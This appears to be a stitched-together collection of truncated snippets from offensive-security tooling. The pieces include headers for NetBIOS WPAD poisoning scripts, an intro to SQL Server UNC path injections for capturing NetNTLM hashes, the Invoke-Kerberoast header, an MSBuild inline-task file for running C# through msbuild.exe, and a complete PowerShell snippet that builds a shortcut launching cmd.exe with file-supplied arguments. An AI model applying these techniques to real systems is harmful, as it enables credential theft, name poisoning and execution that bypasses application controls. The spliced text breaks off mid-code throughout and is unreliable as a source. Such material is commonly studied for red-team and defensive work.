function Get-DownloadedPEHashes
{
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory=$true, Position=0)]
        [String]$Path,
        [Switch]$Recursive = $true
    )
    if (!$Path.EndsWith('\'))

#!/usr/bin/env ruby
# -*- coding: binary -*-
#
# Poison a system's NetBIOS resolver for the WPAD name (not BadTunnel)
#
# Usage: ruby netbios-brute-local.rb <evil-wpad-server> <target-ip> <target-port> <pps>
# Contact: x[at]hdm.io
# License: https://opensource.org/licenses/BSD-2-Clause
#

#!/usr/bin/env ruby
# -*- coding: binary -*-
#
# Poison a system's NetBIOS resolver for the WPAD name from outside NAT (not BadTunnel)
#
# Usage: ruby netbios-brute-nat.rb <evil-wpad-server> <pps>
# Contact: x[at]hdm.io
# License: https://opensource.org/licenses/BSD-2-Clause
#

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
namespace Export
{
    class Test
    {

#!/bin/bash
# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update
# remove previously installed Docker
sudo apt-get purge lxc-docker*
sudo apt-get purge docker.io*

This is a list of SQL Server commands that support UNC path [injections] by default.
The injections can be used to capture or replay the NetNTLM password hash of the
Windows account used to run the SQL Server service. The SQL Server service account
has sysadmin privileges by default in all versions of SQL Server.
Note: This list is most likely not complete.
-----------------------------------------------------------------------
-- UNC Path Injections Executable by the Public Fixed Server Role
-----------------------------------------------------------------------

<#
Invoke-Kerberoast.ps1
Author: Will Schroeder (@harmj0y), @machosec
License: BSD 3-Clause
Required Dependencies: None
Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast).
Note: the primary method of use will be Invoke-Kerberoast with various targeting options.

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
  <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <PropertyGroup>
    <FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
    <Cmd Condition="'$(Cmd)' == ''">None</Cmd>
  </PropertyGroup>
  <Target Name="Hello">

# Get-SystemDriver requires the ConfigCI module on Win10 Enterprise
# This will collect all signer information for all PEs in C:\
# This will take a while!!!
$Signers = Get-SystemDriver -ScanPath C:\ -UserPEs
# Associate the subject name of each certificate to the file/signer info
# so we can correlate the two.
$CertSubjectMapping = $Signers | % {
    $Signer = $_

$file = Get-Content "c:\test\test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("c:\test\test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = ' '+ $file
$Shortcut.Save()